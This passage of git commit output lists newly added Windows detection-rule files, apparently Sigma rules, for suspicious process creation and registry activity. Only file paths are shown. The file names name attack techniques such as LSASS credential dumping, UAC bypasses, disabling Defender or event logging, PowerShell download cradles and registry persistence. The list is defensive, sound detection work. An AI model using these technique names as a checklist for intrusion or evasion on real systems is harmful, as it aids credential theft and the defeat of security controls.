bin/main/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_plink_remote_forward.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_print.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_procdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_progname.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_radmin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_recon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_recon_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_recon_net_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_reg_bitlocker.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_reg_open_command.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regsvr32_explorer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_regsvr32_no_dll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_renamed_paexec.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_run_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_sys.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_sc_query.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtask_creation_temp_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtasks_env_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtasks_folder_combos.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtasks_parent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtasks_pattern.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_schtasks_user_temp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_screenconnect_access.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_temp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_script_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_svchost.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_takeown.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_whoami.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_winzip.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_wmi_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_wmic_proc_create_rundll32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_wuauclt.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_wuauclt_cmdline.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_zip_compress.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sysmon_driver_unload.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_system_exe_anomaly.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tap_installer_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_termserv_proc_spawn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tool_nsudo_execution.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tool_psexec.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_tor_browser.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_trust_discovery.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_using_sc_to_change_sevice_image_path_by_non_admin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_using_sc_to_hide_sevices.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_using_settingsynchost_as_lolbin.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_vul_java_remote_debugging.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_webshell_detection.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_whoami_priv.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_winword_dll_load.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_service.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_wsreset_uac_bypass.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_xordump.yml create mode 100644 bin/main/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml create mode 100644 bin/main/rules/windows/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml create mode 100644 bin/main/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml create mode 100644 bin/main/rules/windows/registry/registry_add/registry_add_mal_netwire.yml create mode 100644 bin/main/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml create mode 100644 bin/main/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml create mode 100644 bin/main/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml create mode 100644 bin/main/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml create mode 100644 bin/main/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml create mode 100644 bin/main/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml create mode 100644 bin/main/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml create mode 100644 bin/main/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_crashdump_disabled.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_cve_2021_31979_cve_2021_33771_exploits.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_dns_serverlevelplugindll.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_mal_azorult.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml create mode 100644 bin/main/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_abusing_windows_telemetry_for_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_add_port_monitor.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_change_security_zones.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_chrome_extension.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_creation_service_temp_folder.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_defender_disabled.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_defender_realtime_protection_disabled.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_administrative_share.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_fonction_user.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_microsoft_office_security_features.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_uac_registry.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disabled_pua_protection_on_microsoft_defender.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_dns_over_https_enabled.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_etw_disabled.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_file_association_exefile.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_globalflags_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_hidden_extention.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_hide_file.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_hide_fonction_user.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_ie_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_mal_adwind.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_office_security.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_outlook_security.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml create mode 100644 